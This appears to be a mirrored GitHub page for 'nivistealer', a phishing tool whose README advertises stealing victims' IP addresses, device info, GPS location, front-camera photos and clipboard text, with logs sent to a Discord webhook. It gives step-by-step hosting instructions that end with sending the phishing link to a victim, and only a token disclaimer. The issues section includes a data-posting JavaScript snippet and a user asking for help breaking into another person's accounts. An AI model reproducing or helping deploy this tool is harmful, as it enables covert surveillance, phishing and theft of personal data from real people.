Coder Social home page Coder Social logo

swagkarna / nivistealer Goto Github PK

View Code? Open in Web Editor NEW
569.0 21.0 191.0 109 KB

steal victim images exact location device info and much more

License: GNU General Public License v3.0

PHP 5.69% HTML 70.74% Python 6.72% JavaScript 16.85%
stealer phishing saycheese hacking hacking-tool nivistealer hack-camera victim iplogger javascript

nivistealer's Introduction



Nivistealer coded by : swagkarna


  • If you like the tool and for my personal motivation so as to develop other tools please leave a +1 star

Features of Nivi-Stealer:

  • Steal Victim Ip
  • Steal Device Info
  • Steal Network and Battery Info
  • Uses Device Gps to steal exact location
  • Steal pic from front camera
  • Steal text from victim clipboard (added recently)
  • Send logs to discord also save them locally in a txt file
  • Works on android,windows,linux,mac os
  • Uses iframe to load live website to make phishing attack more reliable
  • Bypass x-frame restrictions [2024]

How to use?

Method 0 :

Run on Repl.it

  • Click the above button or click here to run on repl.it
  • Login/Signup on repl.it
  • After it clones the repo edit this line with your repl url
  • Now click Run

Method 1 :

  • Clone or Download this repo
  • Create a account on any webhosting site that provide ssl . I suggest a free webhosting site called 000webhost.com
  • Now upload index.html,sunni.php,post.php on your webhosting site
  • Now open index.html and replace this with your discord webhook url
  • Boom !!! . Now send the phishing link to your victim . Logs will be send to your discord webhook and also saved to sensitiveinfo.txt file

Method 2 :

  • Clone the repo and navigate to python_flask directory
  • open your terminal and type pip3 install colorama pip3 install flask
  • Now edit this line with your url
  • Now type python nivistealer.py Boom !!!
  • Images and log file will be saved locally on your directory

Nivistealer in action[Method 2] :

nivistealer.mp4

Discalimer :

Use this only for educational Purpose.... I am not responsible for your action...Love you Guys.. Stay safe !!! Stay legal !!!


❤️Supporters❤️

Stargazers repo roster for @swagkarna/Nivistealer

Forkers repo roster for @swagkarna/Nivistealer


nivistealer's People

Contributors

prateek-chaubey avatar swagkarna avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

nivistealer's Issues

IP issue

function ipinfo() {
        $.getJSON('https://ipapi.co/json/', function (data) {
            $.ajax({
                type: "POST",
                url: "/ipinfo",
                data: JSON.stringify(data),
                contentType: "application/json",
                dataType: 'json',
                cache: false,
                success: function (data) {
                    console.log(data);
                },
                error: function (xhr, status, error) {
                    console.log(error);
                }
            });
        });
    }

what should I do here url: "/ipinfo", to be compatible for my website ?

I want to learn how to do hack

I have a person that stole my phone and took all the pic and files and almost all the data off my iPhone.
Will you help me get in there's and do it back into all the accounts of there's or someone that can delete and or make all new passwords to where I can get one to see what they stole.
I have there chrome notebook but don't know the password for the gmail. ([email protected]

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.